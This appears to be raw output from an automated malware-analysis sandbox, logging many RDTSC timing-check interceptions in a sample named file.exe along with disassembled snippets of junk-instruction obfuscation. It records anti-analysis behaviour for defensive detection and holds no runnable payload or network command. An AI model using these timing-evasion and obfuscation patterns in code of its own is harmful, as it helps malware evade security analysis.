Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0200 second address: 51B021D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E03C0 second address: 51E03C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E03C6 second address: 51E03CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E03CA second address: 51E03EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFF112B4C25h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210E1B second address: 5210E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFF1080EDE1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007EFF1080EDE9h 0x00000016 mov di, si 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210E55 second address: 5210E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007EFF112B4C1Ah 0x00000012 mov edi, ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210E77 second address: 5210E85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF1080EDDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F05C0 second address: 51F05FD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFF112B4C28h 0x00000008 or cx, 3848h 0x0000000d jmp 00007EFF112B4C1Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 mov dl, A1h 0x00000018 pop esi 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push esi 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F05FD second address: 51F0621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 99h 0x00000005 mov cx, BFF9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp+08h] 0x0000000f pushad 0x00000010 call 00007EFF1080EDE2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F0621 second address: 51F0645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 and dword ptr [eax], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007EFF112B4C24h 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F0645 second address: 51F0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFF1080EDDDh 0x00000009 or eax, 1D56B6D6h 0x0000000f jmp 00007EFF1080EDE1h 0x00000014 popfd 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and dword ptr [eax+04h], 00000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007EFF1080EDE6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D05C1 second address: 51D05DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D05DC second address: 51D0605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, 57ED3459h 0x00000012 push esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D0605 second address: 51D060B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D060B second address: 51D060F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D060F second address: 51D0629 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D0629 second address: 51D062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D062D second address: 51D0633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D0633 second address: 51D0667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ah, dl 0x00000010 jmp 00007EFF1080EDE6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D0667 second address: 51D0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFF112B4C27h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 mov al, dh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52106D1 second address: 521072A instructions: 0x00000000 rdtsc 0x00000002 call 00007EFF1080EDE9h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d mov dh, ah 0x0000000f mov cx, bx 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007EFF1080EDE1h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007EFF1080EDE8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 521072A second address: 5210739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210739 second address: 521073F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 521073F second address: 5210743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210743 second address: 5210786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 mov ch, 5Eh 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007EFF1080EDDAh 0x00000019 xchg eax, ecx 0x0000001a jmp 00007EFF1080EDE0h 0x0000001f mov eax, dword ptr [76FB65FCh] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov cx, bx 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210786 second address: 52107BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 2E71h 0x00000007 mov ax, 40ADh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 jmp 00007EFF112B4C28h 0x00000015 je 00007EFF82FD7DCEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52107BA second address: 52107C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52107C0 second address: 52107FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFF112B4C22h 0x00000009 xor al, FFFFFFD8h 0x0000000c jmp 00007EFF112B4C1Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ecx, eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007EFF112B4C20h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52107FC second address: 5210864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007EFF1080EDDFh 0x00000011 and ecx, 1Fh 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007EFF1080EDE4h 0x0000001b and ax, 7CC8h 0x00000020 jmp 00007EFF1080EDDBh 0x00000025 popfd 0x00000026 movzx eax, dx 0x00000029 popad 0x0000002a ror eax, cl 0x0000002c jmp 00007EFF1080EDDBh 0x00000031 leave 0x00000032 pushad 0x00000033 mov esi, 6074094Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a movzx esi, dx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210864 second address: 52108B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 retn 0004h 0x0000000a nop 0x0000000b mov esi, eax 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 xor esi, dword ptr [00FC2014h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c push eax 0x0000001d call 00007EFF155453C4h 0x00000022 push FFFFFFFEh 0x00000024 pushad 0x00000025 jmp 00007EFF112B4C25h 0x0000002a pushfd 0x0000002b jmp 00007EFF112B4C20h 0x00000030 xor si, 0CB8h 0x00000035 jmp 00007EFF112B4C1Bh 0x0000003a popfd 0x0000003b popad 0x0000003c pop eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 mov esi, 62755A01h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52108B2 second address: 5210947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007EFF1080EDE2h 0x0000000e mov bl, al 0x00000010 pop ebx 0x00000011 popad 0x00000012 ret 0x00000013 nop 0x00000014 push eax 0x00000015 call 00007EFF14A9F5EAh 0x0000001a mov edi, edi 0x0000001c jmp 00007EFF1080EDDAh 0x00000021 xchg eax, ebp 0x00000022 jmp 00007EFF1080EDE0h 0x00000027 push eax 0x00000028 jmp 00007EFF1080EDDBh 0x0000002d xchg eax, ebp 0x0000002e jmp 00007EFF1080EDE6h 0x00000033 mov ebp, esp 0x00000035 jmp 00007EFF1080EDE0h 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007EFF1080EDE7h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C009F second address: 51C00C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 1F613D3Eh 0x00000012 mov cl, bh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C00C0 second address: 51C00D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF1080EDDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C00D0 second address: 51C00D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C00D4 second address: 51C0127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007EFF1080EDDCh 0x00000010 sub ax, 0A38h 0x00000015 jmp 00007EFF1080EDDBh 0x0000001a popfd 0x0000001b mov bx, ax 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007EFF1080EDE2h 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 movzx esi, bx 0x0000002a mov eax, edi 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov ecx, ebx 0x00000033 mov edx, 3CE443E0h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0127 second address: 51C0148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0148 second address: 51C0165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0165 second address: 51C023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007EFF112B4C1Eh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov al, 00h 0x00000015 pushfd 0x00000016 jmp 00007EFF112B4C23h 0x0000001b or al, 0000002Eh 0x0000001e jmp 00007EFF112B4C29h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov esi, ebx 0x00000029 pushfd 0x0000002a jmp 00007EFF112B4C23h 0x0000002f or cl, 0000003Eh 0x00000032 jmp 00007EFF112B4C29h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007EFF112B4C23h 0x00000043 or si, AA4Eh 0x00000048 jmp 00007EFF112B4C29h 0x0000004d popfd 0x0000004e jmp 00007EFF112B4C20h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C023F second address: 51C0245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0245 second address: 51C0249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0249 second address: 51C028F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007EFF1080EDE3h 0x00000016 call 00007EFF1080EDE8h 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C028F second address: 51C02AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 mov eax, 0168FB59h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFF112B4C1Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C02AF second address: 51C02B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C02B5 second address: 51C02F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007EFF112B4C1Bh 0x00000010 xor ecx, 3E9F3D2Eh 0x00000016 jmp 00007EFF112B4C29h 0x0000001b popfd 0x0000001c push ecx 0x0000001d mov bx, 4C42h 0x00000021 pop edi 0x00000022 popad 0x00000023 xchg eax, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C02F9 second address: 51C02FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C02FD second address: 51C0318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0318 second address: 51C031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C031E second address: 51C0322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0322 second address: 51C034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007EFF1080EDE7h 0x0000000f je 00007EFF8257D0A8h 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C034D second address: 51C0353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0353 second address: 51C0379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFF1080EDE5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0379 second address: 51C038E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C038E second address: 51C0394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0394 second address: 51C0398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0398 second address: 51C03BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007EFF8257D061h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFF1080EDE2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C03BA second address: 51C03EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007EFF112B4C26h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C03EA second address: 51C04CF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFF1080EDE8h 0x00000008 adc si, F418h 0x0000000d jmp 00007EFF1080EDDBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 test edx, 61000000h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007EFF1080EDE0h 0x00000025 or cx, 5E78h 0x0000002a jmp 00007EFF1080EDDBh 0x0000002f popfd 0x00000030 mov cx, A1AFh 0x00000034 popad 0x00000035 jne 00007EFF8257D015h 0x0000003b jmp 00007EFF1080EDE2h 0x00000040 test byte ptr [esi+48h], 00000001h 0x00000044 pushad 0x00000045 mov cx, 226Dh 0x00000049 pushfd 0x0000004a jmp 00007EFF1080EDDAh 0x0000004f xor cx, C808h 0x00000054 jmp 00007EFF1080EDDBh 0x00000059 popfd 0x0000005a popad 0x0000005b jne 00007EFF8257CFF0h 0x00000061 jmp 00007EFF1080EDE6h 0x00000066 test bl, 00000007h 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c pushfd 0x0000006d jmp 00007EFF1080EDDDh 0x00000072 xor si, 49D6h 0x00000077 jmp 00007EFF1080EDE1h 0x0000007c popfd 0x0000007d popad 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C04CF second address: 51C04EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF112B4C28h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C04EB second address: 51C04EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B088D second address: 51B08A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF112B4C24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B08A5 second address: 51B08A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B08A9 second address: 51B092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007EFF112B4C1Ch 0x0000000f mov cx, CCD1h 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007EFF112B4C27h 0x0000001a or ax, 9BBEh 0x0000001f jmp 00007EFF112B4C29h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007EFF112B4C1Ah 0x0000002f sbb ecx, 4972B4B8h 0x00000035 jmp 00007EFF112B4C1Bh 0x0000003a popfd 0x0000003b movzx eax, dx 0x0000003e popad 0x0000003f movsx edi, si 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B092C second address: 51B0930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0930 second address: 51B0934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0934 second address: 51B093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B093A second address: 51B0955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF112B4C27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0955 second address: 51B099F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007EFF1080EDDEh 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFF1080EDE7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B099F second address: 51B09A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B09A5 second address: 51B09A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B09A9 second address: 51B09B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B09B8 second address: 51B09BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B09BE second address: 51B09C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B09C4 second address: 51B09C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
